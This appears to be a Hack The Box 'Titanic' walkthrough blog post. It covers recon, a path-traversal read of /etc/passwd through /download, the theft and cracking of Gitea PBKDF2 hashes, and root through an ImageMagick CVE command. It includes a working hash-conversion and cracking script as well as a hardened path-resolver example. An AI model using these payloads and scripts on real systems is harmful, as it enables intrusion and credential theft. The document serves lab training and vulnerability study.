HTB_Titanic

TelBo_on published on
3 min, 586 words

Categories: OSCP

user

recon

ports information
 sudo nmap -sS -sC -sV -p22,80 titanic.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 20:54 +08
Nmap scan report for titanic.htb (10.129.193.2)
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Titanic - Book Your Ship Trip
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/3.0.3 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds

The target has ports 22 and 80 open. Port 80 serves a Flask web application behind Apache (the Werkzeug/3.0.3 Python/3.10.12 server header gives it away). The pages themselves offer no functionality worth attacking, so I ran a directory scan. It turned up no leaked sensitive files, but it did reveal two endpoints, /download and /book.

dirsearch -u http://titanic.htb/                                                   
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kalier/Hackthebox/Titanic/reports/http_titanic.htb/__25-02-17_20-57-47.txt

Target: http://titanic.htb/

[20:57:47] Starting: 
[20:58:59] 405 -  153B  - /book                                             
[20:59:16] 400 -   41B  - /download                                         
[21:00:09] 403 -  276B  - /server-status                                    
[21:00:09] 403 -  276B  - /server-status/

Virtual host brute-forcing turned up a subdomain, dev.titanic.htb.

gobuster vhost -u http://titanic.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -r 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://titanic.htb/
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.titanic.htb Status: 200 [Size: 13982]

The subdomain hosts a private Gitea instance; I registered an account and logged in. There is a user named developer with two repositories, gitea and mysql. The gitea repository contains the source code of the web service on port 80. Reading through it, the download endpoint looks vulnerable to LFI (path traversal), so I tried the payload /../../../../../etc/passwd and got /etc/passwd back, which confirms the bug. The same request reads user.txt directly.
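The root cause is worth seeing in code. The following is an added example, not the application's source (which this post does not reproduce): a download-style path resolver written the way a handler typically builds the argument to send_file, next to a hardened version, with a tiny sandbox to exercise both. The parameter name ticket, the directory layout and the file contents are constructed for the demonstration.

```python
import os
import tempfile


def make_sandbox():
    """Constructed layout: <root>/tickets/ is the download directory, and
    <root>/secret.txt stands in for a file that must never be served."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "tickets")
    os.mkdir(base)
    with open(os.path.join(base, "ticket.json"), "w") as f:
        f.write('{"name": "guest"}')
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("not for download")
    return root, base


def vulnerable_resolve(base, ticket):
    """The LFI pattern: the user-supplied name is joined onto the base
    directory and handed to open()/send_file as-is. ".." walks out of base,
    and a name beginning with "/" makes os.path.join drop base altogether."""
    return os.path.join(base, ticket)


def hardened_resolve(base, ticket):
    """Resolve symlinks and ".." first, then require the result to lie inside
    base; anything that escapes is rejected instead of served."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, ticket))
    if os.path.commonpath([base_real, target]) != base_real:
        return None
    return target


def read_via(resolver, base, ticket):
    """Simulate the handler: resolve the name, then return the file body
    (or None when the resolver refuses or the file does not exist)."""
    path = resolver(base, ticket)
    if path is None or not os.path.isfile(path):
        return None
    with open(path) as f:
        return f.read()


if __name__ == "__main__":
    root, base = make_sandbox()
    for payload in ("ticket.json", "../secret.txt", root + "/secret.txt"):
        print(payload, "->",
              read_via(vulnerable_resolve, base, payload), "|",
              read_via(hardened_resolve, base, payload))
```

Because os.path.join discards the base directory entirely when the second argument starts with /, a payload of the form /../../../../../etc/passwd hits the vulnerable resolver without needing enough ../ to climb to the root. The hardened version rejects absolute paths, .. sequences and symlinks pointing out of the directory alike, because the check runs on the fully resolved path.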

First Foothold

The docker-compose.yml in the gitea repository reveals the absolute path of the Gitea data directory on the host: /home/developer/gitea/data. With the LFI we can pull Gitea's SQLite database and crack its password hashes offline. The database path can be hunted down from configuration or simply guessed; it turned out to be /home/developer/gitea/data/gitea/gitea.db. After downloading it, I found that the user table does not store hashes in a form hashcat accepts directly: passwd holds the hex PBKDF2 digest, salt holds the salt, and passwd_hash_algo names the algorithm and its parameters. I found a conversion script on GitHub: I Get this. Gitea's app.ini confirms PBKDF2 as the password hash algorithm, which corresponds to hashcat mode 10900 (PBKDF2-HMAC-SHA256). I saved the script's output verbatim to a text file and ran it against rockyou. My command was as follows:
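The conversion that script performs is small enough to write yourself, and doing so makes the hash format explicit. Below is an added example (my code, not the GitHub script's and not Gitea's): it reads the user table from a gitea.db, emits hashcat mode 10900 lines with the username prefix that --user expects, and includes a small dictionary check so the format can be verified offline without hashcat. The database contents are a constructed fixture with one account, developer, whose password is password; the column names and the pbkdf2$50000$50 algorithm string follow Gitea's schema, and the salt handling (32-character salts are hex-decoded, shorter legacy salts are used as raw bytes) follows Gitea's source as I know it.

```python
import base64
import hashlib
import sqlite3

# Gitea's default PBKDF2 parameters, as encoded in passwd_hash_algo = "pbkdf2$50000$50":
# 50000 iterations of HMAC-SHA256 producing a 50-byte derived key.
DEFAULT_ITER, DEFAULT_KEYLEN = 50000, 50


def gitea_salt_bytes(salt):
    """Gitea stores the salt as a 32-char hex string (16 random bytes) and
    hex-decodes it before hashing; older short salts are used as raw bytes."""
    if len(salt) == 32:
        try:
            return bytes.fromhex(salt)
        except ValueError:
            pass
    return salt.encode()


def to_hashcat_10900(name, passwd_hex, salt, algo):
    """hashcat -m 10900 wants sha256:<iterations>:<base64 salt>:<base64 digest>;
    the leading "<user>:" is what the --user flag strips off."""
    parts = algo.split("$")
    iterations = int(parts[1]) if len(parts) > 1 else DEFAULT_ITER
    b64 = lambda b: base64.b64encode(b).decode()
    return f"{name}:sha256:{iterations}:{b64(gitea_salt_bytes(salt))}:{b64(bytes.fromhex(passwd_hex))}"


def dump_users(con):
    """Convert every PBKDF2 account in an open gitea.db connection to hashcat lines."""
    rows = con.execute("SELECT name, passwd, salt, passwd_hash_algo FROM user").fetchall()
    return [to_hashcat_10900(n, p, s, a) for n, p, s, a in rows if a.startswith("pbkdf2")]


def check_candidate(line, candidate):
    """Recompute one hashcat line for a candidate password (what hashcat does
    in bulk); the derived-key length is the length of the stored digest."""
    _, _, iters, b64salt, b64digest = line.split(":")
    salt, digest = base64.b64decode(b64salt), base64.b64decode(b64digest)
    return hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, int(iters), len(digest)) == digest


def crack(lines, wordlist):
    """Tiny dictionary attack: returns {user: password} for every line it cracks."""
    found = {}
    for line in lines:
        user = line.split(":", 1)[0]
        for word in wordlist:
            if check_candidate(line, word):
                found[user] = word
                break
    return found


def make_sample_db():
    """Constructed fixture standing in for gitea.db: one account, "developer",
    with the password "password". A fixed 16-byte salt keeps the run reproducible."""
    salt = "00112233445566778899aabbccddeeff"
    digest = hashlib.pbkdf2_hmac("sha256", b"password", bytes.fromhex(salt),
                                 DEFAULT_ITER, DEFAULT_KEYLEN).hex()
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, passwd TEXT, salt TEXT, passwd_hash_algo TEXT)")
    con.execute("INSERT INTO user VALUES (?, ?, ?, ?)",
                ("developer", digest, salt, "pbkdf2$50000$50"))
    con.commit()
    return con


if __name__ == "__main__":
    # Against a real copy: con = sqlite3.connect("gitea.db"), write the lines to
    # hashes.txt, then run hashcat -m 10900 -a 0 --user hashes.txt rockyou.txt
    con = make_sample_db()
    lines = dump_users(con)
    print("\n".join(lines))
    print(crack(lines, ["123456", "password"]))
```

One caveat the hashcat run below illustrates: "All hashes found as potfile" means a previous run already cracked them, so hashcat stops immediately and the result has to be pulled out with --show rather than read off the run itself.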

hashcat -m 10900 -a 0  ./hashes.txt /usr/share/wordlists/rockyou.txt --force --user       
hashcat (v6.2.6) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

INFO: All hashes found as potfile and/or empty entries! Use --show to display them.

Started: Mon Feb 17 21:34:10 2025
Stopped: Mon Feb 17 21:34:11 2025

This yielded developer's password, which also works as an SSH credential.

Root

Enumerating the host with linpeas turned up a script:

developer@titanic:/opt/scripts$ ls
identify_images.sh

developer@titanic:/opt/scripts$ cat identify_images.sh 
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

What the script does:

  1. Change into /opt/app/static/assets/images.

  2. Truncate metadata.log to zero length.

  3. Find every .jpg file under /opt/app/static/assets/images/ and its subdirectories.

  4. Run ImageMagick's identify on each of them to extract the image metadata.

  5. Append that metadata to metadata.log.

Since it invokes the magick binary, I checked its version and searched for a matching CVE. There is one:

Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)

I reproduced the PoC, changing the command it executes to: cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt. Once the script runs (it executes magick as root, which is what makes the copy out of /root succeed), the root flag is readable from /tmp.

Summary

Nothing much to summarize for now.